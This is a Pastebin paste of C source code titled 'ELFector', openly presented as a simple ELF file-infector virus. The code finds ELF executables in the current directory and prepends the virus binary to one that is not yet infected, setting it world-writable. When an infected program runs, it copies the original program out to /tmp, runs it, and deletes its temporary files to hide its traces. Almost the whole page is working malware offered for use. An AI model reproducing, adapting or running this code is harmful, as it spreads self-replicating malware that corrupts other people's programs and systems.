Advertisement
FlyFar

ELFector - A simple ELF file infector virus

Jul 7th, 2023
1,091
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.62 KB | Cybersecurity | 0 0
  1. #include<stdio.h>
  2. #include<stdlib.h>
  3. #include<string.h>
  4.  
  5. int is_file_infected (char filename[])
  6. {
  7.     char output[400];
  8.     char command [400];
  9.     snprintf(command, sizeof command, "%s%s%s", "strings ", filename, "| grep virus > /tmp/virussearch046.txt");
  10.     char inf[] = "virus";
  11.     FILE *finf;
  12.     system(&command[0]);   
  13.     finf = fopen("/tmp/virussearch046.txt", "r");
  14.     fgets(output,399,finf);
  15.     return (strstr(output,inf) != NULL);
  16. }
  17.  
  18. int is_file_elf(char filename[])
  19. {
  20.     char command[200];
  21.     snprintf(command, sizeof command, "%s%s%s", "file ", filename, " > /tmp/elfsearch046.txt");
  22.     char elf[] = "ELF";
  23.     char output[200];
  24.     FILE *file;
  25.     system(&command[0]);
  26.     file = fopen("/tmp/elfsearch046.txt", "r");
  27.     fgets(output,199,file);
  28.     return (strstr(output,elf) != NULL);
  29. }
  30.  
  31. int main(int argc, char* argv[])
  32. {
  33.     FILE *fp;
  34.     FILE *virus_file,*target_file,*current_file;
  35.     char command[500];
  36.     char filename[100];
  37.    
  38.     system("ls > /tmp/contents046.txt");
  39.     fp = fopen("/tmp/contents046.txt", "r");
  40.     while (!feof(fp))
  41.     {
  42.         fgets(filename,300,fp);
  43.         filename[strlen(filename)-1]='\0';
  44.         if(is_file_elf(filename))
  45.         {
  46.            if (is_file_infected(filename) == 0)
  47.             {
  48.                 snprintf(command, sizeof command, "%s%s%s%s%s%s", "cat virus ", filename, " > /tmp/infect046.tmp;mv /tmp/infect046.tmp ", filename, ";chmod 777 ", filename);
  49.                 system(&command[0]);
  50.                 break;
  51.             }
  52.            
  53.         }
  54.     }
  55.     if(strcmp(argv[0],"virus") == 0 || strcmp(argv[0] , "./virus") == 0)
  56.     {
  57.         char delete_command[] = "find /tmp -name '*046*' -delete";
  58.         system(&delete_command[0]);
  59.         exit(0);       
  60.     }
  61.     else
  62.     {
  63.         char ch;int i;
  64.         virus_file = fopen("virus", "r");
  65.         fseek(virus_file,0,SEEK_END);
  66.         int end = ftell(virus_file);
  67.         fclose(virus_file);
  68.         current_file = fopen(argv[0],"r");
  69.         target_file = fopen("/tmp/target046","w");
  70.         fseek(current_file, end, SEEK_SET);
  71.         while (!feof(current_file))
  72.         {
  73.             ch = fgetc(current_file);
  74.             fputc(ch, target_file);
  75.         }
  76.         fclose(current_file);
  77.         fclose(target_file);
  78.         system("chmod 777 /tmp/target046");
  79.         if(argc==1)
  80.         {
  81.             system("/tmp/target046");
  82.         }
  83.         else
  84.         {
  85.             char original_functionality[200] = "/tmp/target046 ";
  86.             for (i=2; i<=argc; i++)
  87.             {  
  88.                 if(i == argc)
  89.                     strcat(original_functionality, argv[i-1]);
  90.                 else
  91.                     {
  92.                         strcat(original_functionality, argv[i-1]);
  93.                         strcat(original_functionality, " ");
  94.                     }
  95.             }
  96.             system(&original_functionality[0]);        
  97.         }  
  98.     }
  99.     printf("My name is ELFector and thank you for running me!\n");
  100.     char delete_command[] = "find /tmp -name '*046*' -delete";
  101.     system(&delete_command[0]);
  102.     return 0;
  103. }
  104.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement